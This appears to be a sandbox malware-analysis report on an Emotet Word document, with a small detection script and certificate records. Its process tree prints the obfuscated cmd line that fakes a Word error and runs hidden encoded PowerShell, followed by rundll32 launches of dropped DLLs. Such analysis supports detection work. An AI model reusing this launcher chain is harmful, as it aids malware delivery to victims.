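    hits = correlate(DNS_ANSWERS, TCP_CONNECTS, HTTP_RESPONSES)
    for e in hits:
        print(f'{e["time"]:%H:%M:%S} {str(e["domain"]):<20} {e["ip"]:<16}:{e["port"]} '
              f'{e["path"] or "(tls)"} {e["status"] or ""}')
    print(fallthrough_alert(hits))
```

The four TLS sessions carry no visible status line in the report, so they count toward the domain burst but not toward the failed-request list. In production the same two functions would be fed from Zeek dns/conn/http logs or proxy logs keyed by the originating process rather than from a sandbox export.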


                                                                      HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jan 27, 2021 12:17:37.519368887 CET | 177.12.170.95 | 443 | 192.168.2.22 | 49167 | CN=mrveggy.com | CN=R3, O=Let's Encrypt, C=US | Mon Jan 11 02:13:40 CET 2021 | Sun Apr 11 03:13:40 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
  Chain: CN=R3, O=Let's Encrypt, C=US | issued by CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Jan 27, 2021 12:17:42.134701967 CET | 35.163.191.195 | 443 | 192.168.2.22 | 49174 | CN=www.ummahstars.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 20 12:52:22 CET 2020 | Thu May 19 22:40:05 CEST 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
  Chain: CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | issued by CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
  Chain: CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | issued by OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031
  Chain: OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | self-issued (OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US) | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:12:17:33
                                                                      Start date:27/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                      Imagebase:0x13f890000
                                                                      File size:1424032 bytes
                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                                                                      Imagebase:0x4a950000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\msg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                                                      Imagebase:0xff490000
                                                                      File size:26112 bytes
                                                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:36
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w hidden -enc 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
                                                                      Imagebase:0x13fec0000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:17:47
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0xff9b0000
                                                                      File size:45568 bytes
                                                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:48
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:52
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:58
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:02
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:09
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:13
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:18
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:22
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:27
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:32
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:12:18:37
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:12:18:41
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Disassembly

                                                                      Code Analysis